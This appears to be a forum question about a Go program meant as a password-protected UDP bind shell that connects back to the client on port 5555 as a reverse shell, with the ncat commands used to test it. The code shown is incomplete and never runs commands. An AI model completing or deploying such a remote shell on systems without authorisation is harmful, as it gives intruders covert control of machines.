I am doing a UDP shell in Golang (which I have found some on the internet), but with the caveat that it prompts for a password at first.
The password comparison is done (with a simple comparison), but what I want to do is that once the user inputs the password, the shell is open and does not ask for a password anymore until the connection is closed.
So my idea was to ask for a password, and if the password is correct, to connect back to the host on another port (reverse shell), the connection happens but I am not allowed to write on the shell.
Here is my code:
package main
import (
"bufio"
"strings"
"fmt"
"io"
"log"
"net"
"os/exec"
"syscall"
"time"
)
func main() {
udp_bind()
}
func udp_bind() {
message := make([]byte, 2048)
addr := net.UDPAddr{
Port: 6666,
IP: net.ParseIP("127.0.0.1"),
}
ser, err := net.ListenUDP("udp", &addr)
if err != nil {
fmt.Printf("Some error %v
", err)
return
}
for {
rlen, remoteaddr, err := ser.ReadFromUDP(message)
if err != nil {
fmt.Printf("Some error %v", err)
continue
}
data := strings.TrimSpace(string(message[:rlen]))
fmt.Printf("received: %s from %s
", data, remoteaddr)
if data == "pwd" {
go sendResponse(ser, remoteaddr, "From server: correct password ")
go udp_reverse(remoteaddr)
} else {
go sendResponse(ser, remoteaddr, "From server: wrong password ")
}
}
}
func udp_reverse(host *net.UDPAddr) {
obj := host.IP.String() + ":5555"
remoteAddr, err := net.ResolveUDPAddr("udp", obj)
conn, err := net.DialUDP("udp", nil, remoteAddr)
if err != nil {
log.Fatal(err)
}
log.Printf("Established connection to %s
", remoteAddr)
log.Printf("Remote UDP address : %s
", conn.RemoteAddr().String())
log.Printf("Local UDP client address : %s
", conn.LocalAddr().String())
defer conn.Close()
// receive message from server
buffer := make([]byte, 1024)
n, addr, err := conn.ReadFromUDP(buffer)
fmt.Println("UDP Server : ", addr)
fmt.Println("Received from UDP server : ", string(buffer[:n]))
}
I'm running the server with go run main.go
, connecting with netcat from the client with ncat -4u -w1 localhost 6666
and setting up the listener from the client with ncat localhost -vvul 5555
.
The idea is that a client connects to the server via netcat
to port 6666, inputs the password, and if the password is correct the server connects to the client to port 5555 (previously opened in client), and from there the client can write data to the server. If the client closes the connection, the reverse connection stops, whereas port 6666 is constantly listening on the server.
But I do the bind connection, the server is listening, I input the password, the server responds that it is correct, and it opens a reverse connection on port 5555, but I am unable to write anything on the netcat
listener I had set up.